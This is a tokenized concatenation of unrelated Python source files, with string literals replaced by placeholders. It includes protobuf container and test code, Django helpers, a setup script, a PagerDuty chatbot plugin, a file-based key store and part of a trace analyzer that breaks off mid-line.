self , key ) : <EOL> try : <EOL> return self . _values [ key ] <EOL> except KeyError : <EOL> key = self . _key_checker . CheckValue ( key ) <EOL> new_element = self . _message_descriptor . _concrete_class ( ) <EOL> new_element . _SetListener ( self . _message_listener ) <EOL> self . _values [ key ] = new_element <EOL> self . _message_listener . 
Modified ( ) <EOL> return new_element <EOL> def get_or_create ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self [ key ] <EOL> def get ( self , key , default = None ) : <EOL> if key in self : <EOL> return self [ key ] <EOL> else : <EOL> return default <EOL> def __contains__ ( self , item ) : <EOL> return item in self . _values <EOL> def __setitem__ ( self , key , value ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def __delitem__ ( self , key ) : <EOL> del self . _values [ key ] <EOL> self . _message_listener . Modified ( ) <EOL> def __len__ ( self ) : <EOL> return len ( self . _values ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _values ) <EOL> def MergeFrom ( self , other ) : <EOL> for key in other : <EOL> self [ key ] . MergeFrom ( other [ key ] ) <EOL> def clear ( self ) : <EOL> self . _values . clear ( ) <EOL> self . _message_listener . Modified ( ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> from google . protobuf import unittest_pb2 <EOL> from google . protobuf import symbol_database <EOL> class SymbolDatabaseTest ( unittest . TestCase ) : <EOL> def _Database ( self ) : <EOL> db = symbol_database . SymbolDatabase ( ) <EOL> db . RegisterFileDescriptor ( unittest_pb2 . DESCRIPTOR ) <EOL> db . RegisterMessage ( unittest_pb2 . TestAllTypes ) <EOL> db . RegisterMessage ( unittest_pb2 . TestAllTypes . NestedMessage ) <EOL> db . RegisterMessage ( unittest_pb2 . TestAllTypes . OptionalGroup ) <EOL> db . RegisterMessage ( unittest_pb2 . TestAllTypes . RepeatedGroup ) <EOL> db . RegisterEnumDescriptor ( unittest_pb2 . ForeignEnum . DESCRIPTOR ) <EOL> db . RegisterEnumDescriptor ( unittest_pb2 . TestAllTypes . NestedEnum . DESCRIPTOR ) <EOL> return db <EOL> def testGetPrototype ( self ) : <EOL> instance = self . _Database ( ) . GetPrototype ( <EOL> unittest_pb2 . TestAllTypes . DESCRIPTOR ) <EOL> self . assertTrue ( instance is unittest_pb2 . TestAllTypes ) <EOL> def testGetMessages ( self ) : <EOL> messages = self . _Database ( ) . GetMessages ( <EOL> [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( <EOL> unittest_pb2 . TestAllTypes is <EOL> messages [ '<STR_LIT>' ] ) <EOL> def testGetSymbol ( self ) : <EOL> self . assertEqual ( <EOL> unittest_pb2 . TestAllTypes , self . _Database ( ) . GetSymbol ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> unittest_pb2 . TestAllTypes . NestedMessage , self . _Database ( ) . GetSymbol ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> unittest_pb2 . TestAllTypes . OptionalGroup , self . _Database ( ) . GetSymbol ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> unittest_pb2 . TestAllTypes . RepeatedGroup , self . _Database ( ) . GetSymbol ( <EOL> '<STR_LIT>' ) ) <EOL> def testEnums ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . 
FindEnumTypeByName ( <EOL> '<STR_LIT>' ) . full_name ) <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindEnumTypeByName ( <EOL> '<STR_LIT>' ) . full_name ) <EOL> def testFindMessageTypeByName ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindMessageTypeByName ( <EOL> '<STR_LIT>' ) . full_name ) <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindMessageTypeByName ( <EOL> '<STR_LIT>' ) . full_name ) <EOL> def testFindFindContainingSymbol ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindFileContainingSymbol ( <EOL> '<STR_LIT>' ) . name ) <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindFileContainingSymbol ( <EOL> '<STR_LIT>' ) . name ) <EOL> def testFindFileByName ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindFileByName ( <EOL> '<STR_LIT>' ) . name ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from google . protobuf import descriptor as _descriptor <EOL> from google . protobuf import message as _message <EOL> from google . protobuf import reflection as _reflection <EOL> from google . protobuf import symbol_database as _symbol_database <EOL> from google . protobuf import descriptor_pb2 <EOL> _sym_db = _symbol_database . Default ( ) <EOL> DESCRIPTOR = _descriptor . FileDescriptor ( <EOL> name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> syntax = '<STR_LIT>' , <EOL> serialized_pb = b'<STR_LIT>' <EOL> ) <EOL> _sym_db . RegisterFileDescriptor ( DESCRIPTOR ) <EOL> _IMPORTNOARENANESTEDMESSAGE = _descriptor . Descriptor ( <EOL> name = '<STR_LIT>' , <EOL> full_name = '<STR_LIT>' , <EOL> filename = None , <EOL> file = DESCRIPTOR , <EOL> containing_type = None , <EOL> fields = [ <EOL> _descriptor . FieldDescriptor ( <EOL> name = '<STR_LIT:d>' , full_name = '<STR_LIT>' , index = <NUM_LIT:0> , <EOL> number = <NUM_LIT:1> , type = <NUM_LIT:5> , cpp_type = <NUM_LIT:1> , label = <NUM_LIT:1> , <EOL> has_default_value = False , default_value = <NUM_LIT:0> , <EOL> message_type = None , enum_type = None , containing_type = None , <EOL> is_extension = False , extension_scope = None , <EOL> options = None ) , <EOL> ] , <EOL> extensions = [ <EOL> ] , <EOL> nested_types = [ ] , <EOL> enum_types = [ <EOL> ] , <EOL> options = None , <EOL> is_extendable = False , <EOL> syntax = '<STR_LIT>' , <EOL> extension_ranges = [ ] , <EOL> oneofs = [ <EOL> ] , <EOL> serialized_start = <NUM_LIT> , <EOL> serialized_end = <NUM_LIT> , <EOL> ) <EOL> DESCRIPTOR . message_types_by_name [ '<STR_LIT>' ] = _IMPORTNOARENANESTEDMESSAGE <EOL> ImportNoArenaNestedMessage = _reflection . GeneratedProtocolMessageType ( '<STR_LIT>' , ( _message . Message , ) , dict ( <EOL> DESCRIPTOR = _IMPORTNOARENANESTEDMESSAGE , <EOL> __module__ = '<STR_LIT>' <EOL> ) ) <EOL> _sym_db . RegisterMessage ( ImportNoArenaNestedMessage ) </s>
<s> from django . contrib import admin <EOL> from django . contrib . auth . admin import UserAdmin <EOL> from django . contrib . auth . models import User <EOL> from longerusername . forms import UserCreationForm , UserChangeForm <EOL> class LongerUserNameUserAdmin ( UserAdmin ) : <EOL> add_form = UserCreationForm <EOL> form = UserChangeForm <EOL> admin . site . unregister ( User ) <EOL> admin . site . register ( User , LongerUserNameUserAdmin ) </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> from django_seo_js import VERSION <EOL> ROOT_DIR = os . path . dirname ( __file__ ) <EOL> SOURCE_DIR = os . path . join ( ROOT_DIR ) <EOL> reqs = [ ] <EOL> with open ( "<STR_LIT>" , "<STR_LIT>" ) as f : <EOL> for line in f . readlines ( ) : <EOL> reqs . append ( line . strip ( ) ) <EOL> test_reqs = [ ] <EOL> with open ( "<STR_LIT>" , "<STR_LIT>" ) as f : <EOL> for line in f . readlines ( ) : <EOL> test_reqs . append ( line . strip ( ) ) <EOL> try : <EOL> import pypandoc <EOL> long_description = pypandoc . convert ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> except ( IOError , ImportError ) : <EOL> long_description = '<STR_LIT>' <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> description = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> long_description = long_description , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> version = VERSION , <EOL> download_url = [ <EOL> '<STR_LIT>' <EOL> % VERSION , <EOL> ] , <EOL> install_requires = reqs , <EOL> tests_require = test_reqs , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> keywords = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> ) </s>
<s> from errors import ErrorMixin <EOL> from email import EmailMixin <EOL> from hipchat import HipChatMixin <EOL> from naturaltime import NaturalTimeMixin <EOL> from room import RoomMixin <EOL> from roster import RosterMixin <EOL> from plugins_library import PluginModulesLibraryMixin <EOL> from schedule import ScheduleMixin <EOL> from settings import SettingsMixin <EOL> from storage import StorageMixin </s>
<s> from will . plugin import WillPlugin <EOL> from will . decorators import respond_to , require_settings <EOL> from will import settings <EOL> import datetime <EOL> import pygerduty <EOL> class PagerDutyPlugin ( WillPlugin ) : <EOL> @ staticmethod <EOL> def _associate_pd_user ( email_address , pager ) : <EOL> try : <EOL> user = next ( pager . users . list ( query = email_address , limit = <NUM_LIT:1> ) ) <EOL> return user <EOL> except StopIteration : <EOL> return None <EOL> def _get_user_email_from_mention_name ( self , mention_name ) : <EOL> try : <EOL> u = self . get_user_by_nick ( mention_name [ <NUM_LIT:1> : ] ) <EOL> email_address = self . get_hipchat_user ( u [ '<STR_LIT>' ] ) [ '<STR_LIT:email>' ] <EOL> return email_address <EOL> except TypeError : <EOL> return None <EOL> def _update_incident ( self , message , incidents , action , assign_to_email = None ) : <EOL> pager = pygerduty . PagerDuty ( settings . PAGERDUTY_SUBDOMAIN , settings . PAGERDUTY_API_KEY ) <EOL> email_address = self . get_hipchat_user ( message . sender [ '<STR_LIT>' ] ) [ '<STR_LIT:email>' ] <EOL> user = self . _associate_pd_user ( email_address , pager ) <EOL> if user is None : <EOL> self . reply ( message , "<STR_LIT>" ) <EOL> return <EOL> if incidents : <EOL> for i in incidents : <EOL> try : <EOL> incident = pager . incidents . show ( entity_id = i ) <EOL> except pygerduty . BadRequest as e : <EOL> if e . code == <NUM_LIT> : <EOL> self . reply ( message , "<STR_LIT>" % i , color = "<STR_LIT>" ) <EOL> continue <EOL> if action == '<STR_LIT>' : <EOL> try : <EOL> incident . acknowledge ( requester_id = user . id ) <EOL> except pygerduty . BadRequest as e : <EOL> if e . code == <NUM_LIT> : <EOL> self . reply ( message , "<STR_LIT>" % i , color = "<STR_LIT>" ) <EOL> continue <EOL> elif action == '<STR_LIT>' : <EOL> try : <EOL> incident . resolve ( requester_id = user . id ) <EOL> except pygerduty . BadRequest as e : <EOL> if e . code == <NUM_LIT> : <EOL> self . 
reply ( message , "<STR_LIT>" % i , color = "<STR_LIT>" ) <EOL> continue <EOL> elif action == '<STR_LIT>' : <EOL> try : <EOL> if assign_to_email is not None : <EOL> assign_to = self . _associate_pd_user ( assign_to_email , pager ) <EOL> if assign_to is None : <EOL> self . reply ( message , "<STR_LIT>" % assign_to_email ) <EOL> return <EOL> else : <EOL> incident . reassign ( user_ids = [ assign_to . id ] , requester_id = user . id ) <EOL> except pygerduty . BadRequest : <EOL> continue <EOL> self . reply ( message , "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> if action == '<STR_LIT>' : <EOL> for incident in pager . incidents . list ( status = '<STR_LIT>' , assigned_to = user ) : <EOL> incident . acknowledge ( requester_id = user . id ) <EOL> elif action == '<STR_LIT>' : <EOL> for incident in pager . incidents . list ( status = '<STR_LIT>' ) : <EOL> incident . acknowledge ( requester_id = user . id ) <EOL> elif action == '<STR_LIT>' : <EOL> for incident in pager . incidents . list ( status = '<STR_LIT>' , assigned_to = user ) : <EOL> incident . resolve ( requester_id = user . id ) <EOL> elif action == '<STR_LIT>' : <EOL> for incident in pager . incidents . list ( status = '<STR_LIT>' ) : <EOL> incident . resolve ( requester_id = user . id ) <EOL> self . reply ( message , "<STR_LIT>" ) <EOL> except pygerduty . BadRequest : <EOL> pass <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def ack_all_assigned_incidents ( self , message ) : <EOL> self . _update_incident ( message , None , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def ack_incidents ( self , message , incidents ) : <EOL> self . _update_incident ( message , incidents . split ( "<STR_LIT:U+0020>" ) , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def ack_all_incidents ( self , message ) : <EOL> self . 
_update_incident ( message , None , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def resolve_all_assigned_and_acknowledged_incidents ( self , message ) : <EOL> self . _update_incident ( message , None , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def resolve_incidens ( self , message , incidents ) : <EOL> self . _update_incident ( message , incidents . split ( "<STR_LIT:U+0020>" ) , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def resolve_all_incidents ( self , message ) : <EOL> self . _update_incident ( message , None , '<STR_LIT>' ) <EOL> @ require_settings ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def set_service_maintenance ( self , message , service_name = None , interval = None ) : <EOL> if not interval : <EOL> interval = <NUM_LIT:1> <EOL> pager = pygerduty . PagerDuty ( settings . PAGERDUTY_SUBDOMAIN , settings . PAGERDUTY_API_KEY ) <EOL> for service in pager . services . list ( limit = <NUM_LIT:50> ) : <EOL> if service . name == service_name : <EOL> user = self . _associate_pd_user ( self . get_hipchat_user ( message . sender [ '<STR_LIT>' ] ) [ '<STR_LIT:email>' ] , pager ) <EOL> if user is None : <EOL> self . reply ( message , "<STR_LIT>" , color = "<STR_LIT>" ) <EOL> return <EOL> now = datetime . datetime . utcnow ( ) <EOL> start_time = now . strftime ( "<STR_LIT>" ) <EOL> end_time = ( now + datetime . timedelta ( hours = int ( interval ) ) ) . strftime ( "<STR_LIT>" ) <EOL> try : <EOL> pager . maintenance_windows . create ( service_ids = service . id , requester_id = user . id , <EOL> start_time = start_time , <EOL> end_time = end_time ) <EOL> self . reply ( message , "<STR_LIT>" ) <EOL> except pygerduty . BadRequest as e : <EOL> self . reply ( message , "<STR_LIT>" % e . 
message , color = "<STR_LIT>" ) <EOL> @ respond_to ( "<STR_LIT>" ) <EOL> def reassign_incidents ( self , message , incidents , mention_name ) : <EOL> email_address = self . _get_user_email_from_mention_name ( mention_name ) <EOL> if email_address : <EOL> self . _update_incident ( message , incidents . split ( "<STR_LIT:U+0020>" ) , '<STR_LIT>' , email_address ) <EOL> else : <EOL> self . reply ( message , "<STR_LIT>" % mention_name ) </s>
<s> import logging <EOL> import os <EOL> import time <EOL> from will . utils import sizeof_fmt <EOL> class FileStorageException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileStorage ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , settings ) : <EOL> self . dirname = os . path . abspath ( os . path . expanduser ( settings . FILE_DIR ) ) <EOL> self . dotfile = os . path . join ( self . dirname , "<STR_LIT>" ) <EOL> logging . debug ( "<STR_LIT>" , self . dirname ) <EOL> if not os . path . exists ( self . dirname ) : <EOL> os . makedirs ( self . dirname , mode = <NUM_LIT:0> <NUM_LIT> ) <EOL> elif not os . path . exists ( self . dotfile ) : <EOL> if len ( self . _all_setting_files ( ) ) > <NUM_LIT:0> : <EOL> raise FileStorageException ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( self . dirname , ) ) <EOL> os . chmod ( self . dirname , <NUM_LIT:0> <NUM_LIT> ) <EOL> with open ( self . dotfile , '<STR_LIT:a>' ) : <EOL> os . utime ( self . dotfile , None ) <EOL> def _all_setting_files ( self ) : <EOL> return [ <EOL> os . path . join ( self . dirname , f ) <EOL> for f in os . listdir ( self . dirname ) <EOL> if os . path . isfile ( os . path . join ( self . dirname , f ) ) <EOL> ] <EOL> def _key_paths ( self , key ) : <EOL> key_path = os . path . join ( self . dirname , key ) <EOL> expire_path = os . path . join ( self . dirname , '<STR_LIT:.>' + key + '<STR_LIT>' ) <EOL> return key_path , expire_path <EOL> def save ( self , key , value , expire = None ) : <EOL> key_path , expire_path = self . _key_paths ( key ) <EOL> with open ( key_path , '<STR_LIT:w>' ) as f : <EOL> f . write ( value ) <EOL> if expire is not None : <EOL> with open ( expire_path , '<STR_LIT:w>' ) as f : <EOL> f . write ( expire ) <EOL> elif os . path . exists ( expire_path ) : <EOL> os . unlink ( expire_path ) <EOL> def clear ( self , key ) : <EOL> key_path , expire_path = self . _key_paths ( key ) <EOL> if os . path . exists ( key_path ) : <EOL> os . 
unlink ( key_path ) <EOL> if os . path . exists ( expire_path ) : <EOL> os . unlink ( expire_path ) <EOL> def clear_all_keys ( self ) : <EOL> for filename in self . _all_setting_files ( ) : <EOL> os . unlink ( filename ) <EOL> def load ( self , key ) : <EOL> key_path , expire_path = self . _key_paths ( key ) <EOL> if os . path . exists ( expire_path ) : <EOL> with open ( expire_path , '<STR_LIT:r>' ) as f : <EOL> expire_at = f . read ( ) <EOL> if time . time ( ) > int ( expire_at ) : <EOL> self . clear ( key ) <EOL> return <EOL> if os . path . exists ( key_path ) : <EOL> with open ( key_path , '<STR_LIT:r>' ) as f : <EOL> return f . read ( ) <EOL> def size ( self ) : <EOL> return sizeof_fmt ( sum ( [ <EOL> os . path . getsize ( filename ) <EOL> for filename in self . _all_setting_files ( ) <EOL> ] ) ) <EOL> def bootstrap ( settings ) : <EOL> return FileStorage ( settings ) </s>
<s> from django . http import HttpResponse <EOL> from django . utils . encoding import iri_to_uri <EOL> class HttpResponseReload ( HttpResponse ) : <EOL> """<STR_LIT>""" <EOL> status_code = <NUM_LIT> <EOL> def __init__ ( self , request ) : <EOL> HttpResponse . __init__ ( self ) <EOL> referer = request . META . get ( '<STR_LIT>' ) <EOL> self [ '<STR_LIT>' ] = iri_to_uri ( referer or "<STR_LIT:/>" ) </s>
<s> import sublime <EOL> import sys <EOL> VERSION = int ( sublime . version ( ) ) <EOL> reloader = "<STR_LIT>" <EOL> if VERSION > <NUM_LIT> : <EOL> reloader = '<STR_LIT>' + reloader <EOL> from imp import reload <EOL> if reloader in sys . modules : <EOL> reload ( sys . modules [ reloader ] ) <EOL> if VERSION > <NUM_LIT> : <EOL> from . persistent_regex_highlight import reloader <EOL> from . persistent_regex_highlight . persistent_regex_highlight import * <EOL> else : <EOL> from persistent_regex_highlight import reloader <EOL> from persistent_regex_highlight . persistent_regex_highlight import * </s>
<s> """<STR_LIT>""" <EOL> __title__ = '<STR_LIT>' <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> from . tcptest import tcp_test <EOL> from . colours import Colours <EOL> from . colours import COLOURS <EOL> from . charcoal import Charcoal <EOL> from . get_verify import get_verify <EOL> from . get_host_overrides import get_host_overrides <EOL> from . output import Output <EOL> __all__ = [ '<STR_LIT:.>' ] </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import traceback <EOL> import inspect <EOL> import BinaryCodec <EOL> import Trace <EOL> import TraceOperations <EOL> import Plugin <EOL> import Common <EOL> from common import Task <EOL> from common import Log <EOL> from common import Project <EOL> from common import Console <EOL> from common import pyparsing <EOL> try : <EOL> import readline <EOL> except ImportError : <EOL> pass <EOL> try : <EOL> import psyco <EOL> psyco . full ( ) <EOL> except : <EOL> pass <EOL> try : <EOL> import hotshot , hotshot . stats <EOL> except : <EOL> hotshot = None <EOL> pass <EOL> def getFunctionArguments ( func ) : <EOL> availableArgs , _ , _ , _ = inspect . getargspec ( func ) <EOL> return availableArgs <EOL> def completeKeywordArguments ( func , args ) : <EOL> kwargs = { } <EOL> availableArgs = getFunctionArguments ( func ) <EOL> for arg , value in args . items ( ) : <EOL> if not arg in availableArgs : <EOL> for availableArg in reversed ( availableArgs ) : <EOL> if availableArg . lower ( ) . startswith ( arg ) : <EOL> arg = availableArg <EOL> break <EOL> kwargs [ arg ] = value <EOL> return kwargs <EOL> class ExecutionError ( Exception ) : <EOL> pass <EOL> class Analyzer ( object ) : <EOL> def __init__ ( self , project ) : <EOL> self . project = project <EOL> self . traces = { } <EOL> self . importPlugins = [ ] <EOL> self . exportPlugins = [ ] <EOL> def reportInfo ( self , msg ) : <EOL> pass <EOL> def reportWarning ( self , msg ) : <EOL> pass <EOL> def reportError ( self , msg ) : <EOL> pass <EOL> def reportDebug ( self , msg ) : <EOL> pass <EOL> class ScriptParser ( object ) : <EOL> def __init__ ( self ) : <EOL> p = pyparsing <EOL> p . ParserElement . setDefaultWhitespaceChars ( "<STR_LIT>" ) <EOL> self . commandName = p . Word ( p . alphas , p . alphanums + "<STR_LIT:->" ) <EOL> self . argName = p . Word ( p . alphas , p . alphanums + "<STR_LIT:->" ) <EOL> self . argValue = p . Word ( p . alphanums + "<STR_LIT>" ) | p . 
QuotedString ( '<STR_LIT:">' , escChar = "<STR_LIT:\\>" ) <EOL> self . commandArg = p . Group ( p . Optional ( self . argName + p . Suppress ( "<STR_LIT:=>" ) , default = None ) + self . argValue ) <EOL> self . command = p . Optional ( <EOL> p . Group ( p . Literal ( "<STR_LIT>" ) + p . SkipTo ( p . lineEnd | p . Literal ( "<STR_LIT:;>" ) ) ) | <EOL> p . Group ( self . commandName + p . Optional ( p . Group ( p . ZeroOrMore ( self . commandArg ) ) , default = [ ] ) ) <EOL> ) <EOL> self . commandList = p . delimitedList ( self . command , "<STR_LIT:;>" ) <EOL> self . script = p . delimitedList ( self . commandList , "<STR_LIT:\n>" ) <EOL> def parse ( self , script ) : <EOL> try : <EOL> return self . script . parseString ( script ) <EOL> except pyparsing . ParseException : <EOL> return [ ] <EOL> class InteractiveAnalyzer ( Analyzer , Task . TaskMonitor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , project , options ) : <EOL> Analyzer . __init__ ( self , project ) <EOL> self . commands = { } <EOL> self . commandHelp = { } <EOL> self . options = options <EOL> self . parser = ScriptParser ( ) <EOL> self . done = False <EOL> self . colorizer = Console . colorizer <EOL> self . taskMonitor = Task . RateLimitedTaskMonitor ( self ) <EOL> self . profiling = False <EOL> self . plugins = [ ] <EOL> self . traceFiles = { } <EOL> self . customSyntaxCommands = set ( ) <EOL> if not self . project . targets : <EOL> Log . warn ( "<STR_LIT>" ) <EOL> if not self . projectHasApiDescription ( ) : <EOL> Log . warn ( "<STR_LIT>" ) <EOL> self . registerCommand ( "<STR_LIT>" , self . quit ) <EOL> Task . setMonitor ( self . taskMonitor ) <EOL> self . _loadPlugins ( ) <EOL> def _loadPlugins ( self ) : <EOL> self . importPlugins = [ ] <EOL> self . exportPlugins = [ ] <EOL> self . plugins = [ ] <EOL> def loadPlugins ( pluginModule , collection , loader ) : <EOL> plugins = loader ( self , pluginModule ) <EOL> if self . options . verbose : <EOL> for p in plugins : <EOL> self . 
reportDebug ( "<STR_LIT>" % p ) <EOL> collection . extend ( plugins ) <EOL> for plugin in Plugin . getAvailablePluginModules ( ) : <EOL> loadPlugins ( plugin , self . plugins , Plugin . loadInteractivePlugins ) <EOL> loadPlugins ( plugin , self . importPlugins , Plugin . loadImporterPlugins ) <EOL> loadPlugins ( plugin , self . exportPlugins , Plugin . loadExporterPlugins ) <EOL> def projectHasApiDescription ( self ) : <EOL> if not self . project or not "<STR_LIT:code>" in self . project . targets : <EOL> return False <EOL> return True <EOL> def reportInfo ( self , msg ) : <EOL> for line in str ( msg ) . rstrip ( ) . split ( "<STR_LIT:\n>" ) : <EOL> Log . notice ( line ) <EOL> def reportWarning ( self , msg ) : <EOL> for line in str ( msg ) . rstrip ( ) . split ( "<STR_LIT:\n>" ) : <EOL> Log . warn ( line ) <EOL> def reportError ( self , msg ) : <EOL> for line in str ( msg ) . rstrip ( ) . split ( "<STR_LIT:\n>" ) : <EOL> Log . error ( line ) <EOL> def reportDebug ( self , msg ) : <EOL> for line in str ( msg ) . rstrip ( ) . split ( "<STR_LIT:\n>" ) : <EOL> Log . debug ( line ) <EOL> def fail ( self , message , showException = False ) : <EOL> if showException and sys . exc_info ( ) : <EOL> self . reportDebug ( "<STR_LIT>" . join ( traceback . format_exception ( * sys . exc_info ( ) ) ) ) <EOL> self . reportError ( message ) <EOL> raise ExecutionError ( message ) <EOL> def registerCommand ( self , command , function , helpFunction = None , customSyntax = False ) : <EOL> self . commands [ command ] = function <EOL> self . commandHelp [ command ] = helpFunction <EOL> if customSyntax : <EOL> self . customSyntaxCommands . add ( command ) <EOL> def taskStarted ( self , task ) : <EOL> pass <EOL> def taskProgress ( self , task ) : <EOL> Console . printProgressBar ( task , self . colorizer ) <EOL> def taskFinished ( self , task ) : <EOL> Console . 
eraseProgressBar ( ) <EOL> def parseEventRange ( self , trace , eventRange ) : <EOL> """<STR_LIT>""" <EOL> if not eventRange : <EOL> return ( <NUM_LIT:0> , len ( trace . events ) ) <EOL> def parse ( number , base = <NUM_LIT:0> , default = <NUM_LIT:0> ) : <EOL> if not number : <EOL> return default <EOL> if number [ <NUM_LIT:0> ] == '<STR_LIT:+>' : <EOL> offset = base <EOL> number = number [ <NUM_LIT:1> : ] <EOL> else : <EOL> offset = <NUM_LIT:0> <EOL> try : <EOL> return int ( number ) + offset <EOL> except ValueError : <EOL> assert number [ <NUM_LIT:0> ] == "<STR_LIT:#>" <EOL> targetFrameNumber = int ( number [ <NUM_LIT:1> : ] ) <EOL> frameNumber = <NUM_LIT:0> <EOL> if targetFrameNumber < <NUM_LIT:0> : <EOL> frames = len ( [ e for e in trace . events if self . lookupFunction ( e ) . isFrameMarker ] ) <EOL> targetFrameNumber += frames <EOL> i = <NUM_LIT:0> <EOL> for i , event in enumerate ( trace . events [ offset : ] ) : <EOL> if frameNumber == targetFrameNumber : <EOL> break <EOL> if self . lookupFunction ( event ) . isFrameMarker : <EOL> frameNumber += <NUM_LIT:1> <EOL> return i + offset <EOL> try : <EOL> first , last = eventRange . split ( "<STR_LIT::>" ) <EOL> except ValueError : <EOL> first , last = eventRange , eventRange <EOL> first = parse ( first ) <EOL> last = parse ( last , first , len ( trace . events ) ) <EOL> if first == last : last += <NUM_LIT:1> <EOL> return ( first , last ) <EOL> def parseBoolean ( self , boolean ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return bool ( int ( boolean ) ) <EOL> except ValueError : <EOL> if boolean . lower ( ) in [ "<STR_LIT:yes>" , "<STR_LIT>" , "<STR_LIT:true>" , "<STR_LIT>" ] : <EOL> return True <EOL> return False <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> self . done = True <EOL> def lookupFunction ( self , event ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> library = self . project . targets [ "<STR_LIT:code>" ] . library <EOL> except KeyError : <EOL> return <EOL> if event . name in library . 
functions : <EOL> return library . functions [ event . name ] <EOL> def completeCommand ( self , command ) : <EOL> if command not in self . commands : <EOL> parts = command . split ( "<STR_LIT:->" ) <EOL> for fullCommand in sorted ( self . commands . keys ( ) ) : <EOL> fullParts = fullCommand . split ( "<STR_LIT:->" ) <EOL> if not len ( fullParts ) == len ( parts ) : <EOL> continue <EOL> for p1 , p2 in zip ( fullParts , parts ) : <EOL> if not p1 . startswith ( p2 ) : <EOL> break <EOL> else : <EOL> command = fullCommand <EOL> break <EOL> return command <EOL> def execute ( self , script ) : <EOL> commands = self . parser . parse ( script ) <EOL> if not commands : <EOL> self . fail ( "<STR_LIT>" ) <EOL> for command , commandArgs in commands : <EOL> command = self . completeCommand ( command ) <EOL> if command not in self . commands : <EOL> self . fail ( "<STR_LIT>" ) <EOL> if command not in self . customSyntaxCommands : <EOL> args = [ ] <EOL> kwargs = { } <EOL> for arg , value in commandArgs : <EOL> if arg is None : <EOL> args . append ( value ) <EOL> else : <EOL> kwargs [ arg ] = value <EOL> kwargs = completeKeywordArguments ( self . commands [ command ] , kwargs ) <EOL> else : <EOL> args = [ commandArgs ] <EOL> kwargs = { } <EOL> if self . profiling and hotshot : <EOL> prof = hotshot . Profile ( "<STR_LIT>" ) <EOL> else : <EOL> prof = None <EOL> try : <EOL> if prof : <EOL> prof . runcall ( self . commands [ command ] , * args , ** kwargs ) <EOL> else : <EOL> self . commands [ command ] ( * args , ** kwargs ) <EOL> except Exception , e : <EOL> self . fail ( e , showException = True ) <EOL> if prof : <EOL> prof . close ( ) <EOL> stats = hotshot . stats . load ( "<STR_LIT>" ) <EOL> stats . sort_stats ( "<STR_LIT:time>" , "<STR_LIT>" ) <EOL> stats . print_stats ( <NUM_LIT:20> ) <EOL> def run ( self ) : <EOL> while not self . done : <EOL> try : <EOL> self . colorizer . setColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> try : <EOL> sys . stdout . 
